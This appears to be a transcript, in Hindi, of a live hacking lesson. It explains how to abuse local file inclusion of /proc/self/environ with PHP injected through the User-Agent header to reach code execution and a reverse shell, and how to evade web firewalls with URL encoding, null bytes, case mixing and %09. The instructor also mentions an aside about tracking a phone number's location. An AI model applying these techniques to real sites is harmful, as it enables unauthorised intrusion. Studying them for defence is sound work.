ओके, क्या हो गया? यूजर एजेंट कंट्रोल शिफ्ट वी, ठीक है। प्रॉक सेल्फ, प्रॉक सेल्फ एनवायरन फॉरवर्ड। तो यहाँ से रिवर्स कनेक्शन नहीं मिला, तो किसी और में ट्राई करते हैं, जिससे कि कंटेंट टाइप। बट यहाँ पे क्या काम भी कर रहा है पीएचपी का कोड इसमें? पीएचपी इन्फो, तो इसमें काम नहीं कर रहा। दैट मीन्स कि आपको सबसे पहले इसीलिए चेक करके देखना पड़ता है एक बेसिक सा कोड के बैकएंड पे जाके वो एग्जीक्यूट हो रहा है कि नहीं, ठीक है। तो इसलिए यहाँ पे तो नहीं काम किया। बट इसीलिए आपको सबसे पहले ट्राई करना है, ये फाइल को जैसे ही आपने एक्सेस कर लिया ये वाली फाइल को, प्रॉक सेल्फ एनवायरन, देन आपको ट्राई करना है कि वहाँ पे आप पहले पीएचपी का एक बेसिक सा कोड भेजो जो कि उसके इन्फॉर्मेशन को रिट्रीव करे। अगर वहाँ पे वो रिट्रीव कर रहा है सक्सेसफुली, देन इट्स फाइन, देन आप लोग वहाँ पे परफॉर्म कर सकते हो। आप वहाँ से रिवर्सल ले सकते हो लोकल फाइल इंक्लूजन से। आप उसको लोकल फाइल इंक्लूजन को रिमोट कोड एग्जीक्यूशन पे कन्वर्ट करके ले सकते हो, ठीक है। अरे यार कौन है, इंफॉर्मेशन, ओके। बट अगर वहाँ पे कह सकते हो कि आपका जो कोड है वो बैक एंड पे एग्जीक्यूट नहीं हो रहा है, देन दैट मीन्स कि आप लोग कह सकते हो कि वहाँ पे जिस कोड है आप लोग रिवर्सल नहीं ले सकते हो, ओके। तो बाकी तो यहाँ पे ऑल ओवर मैंने बता ही दिया है लोकल फाइल इंक्लूजन में, ठीक है। और बाकी अगर जैसे कि आप लोगों के फायरवॉल डिटेक्ट कर लेता है, तो आप लोगों की जो डायरेक्टरीज हैं इसको यूआरएल इनकोड कर सकते हो। यूआरएल इनकोड कैसे करोगे? कहीं पे भी चले जाओ और यहाँ पे सर्च कर दो यूआरएल, CODING, HTML यूआरएल इनकोडिंग। यहाँ पे जाओ, चीज़ों को अपना जो भी डेटा पेश कर दो, सबमिट, एंड यहाँ पे ये लो आ गया आपका यूआरएल इनकोड हो गया। कॉपी कर लो एंड वहाँ पे वापस ले जाके पेस्ट कर दो, ठीक है, एंड हिट एंटर, तो भी वही सेम चीज़ काम करेगा और ये फायरवॉल को चकमा देने में हेल्प करेगा, ठीक है। या अगर नॉर्मल ऐसे भी लिख रखा है तो वहाँ पे जो फाइल्स हैं उनके आगे आप लोग ट्राई कर सकते हो X00, ठीक है, ऐसे लिख दो प्रॉक सेल्फ, या थोड़े अपर केस लोअर केस में मिक्स कर दो, जैसे कि इसका मैं L कैपिटल कर देता हूँ और S भी कैपिटल कर देता हूँ, तो भी वैसे काम करेगा, ठीक है। तो आप लोगों को यहाँ पे अपर केस लोअर केस, यहाँ पे डिजिट्स वगैरह लगा एक्स डिजिट्स, ठीक है। और यूआरएल में इनकोड, कोई भी यूआरएल इनकोडिंग यूज़ कर सकते हो, स्पेस की यूआरएल इनकोडिंग यूज़ कर सकते हो यहाँ पे, जो कि %09 होती है, ठीक है। यहाँ पे आप इसको %09 ऐसे ट्राई कर सकते हो, तो भी यहाँ पे ये काम कर रहा है, देख सकते हो, ठीक है। तो यही सारे वो चीज़ें थी जो आप लोग यहाँ पे ट्राई कर सकते हो, ओके। सो बाकी अभी किसी को कोई डाउट है तो वो पूछ सकता है, किसी को कोई चीज़ समझ ना आई हो। किसी को कोई चीज़ समझ नहीं हो, चित्रा, प्रॉक्सी, स्पाइडी, विशाल, आप लोगों को समझ आया? हाँ हाँ, आया समझ में। ठीक है, ओके। सो इसकी मैं वेबसाइट, हाँ अभी मैं फाइंड करने पे लग जाता हूँ, बट एक्चुअली अभी मेरे पास एक और काम है कि एक नंबर की लोकेशन ट्रैक करनी, तो उसको मैं थोड़ा पहले देखता हूँ, थोड़ा मेरे सीनियर्स से मैसेज आया है तो उस वही लोग बार बार मैसेज कर रहे थे, ओके। तो बाकी एनीथिंग एल्स, विशाल आपको आ गया ना? विशाल आपको आ गया? चित्रा आपको आ गया? ओके। चित्रा, आपका, आपको समझ आया कि नहीं आया? आप भी एक बार कंफर्म करा दो, कहीं पे डाउट है तो पूछ सकते हो आप।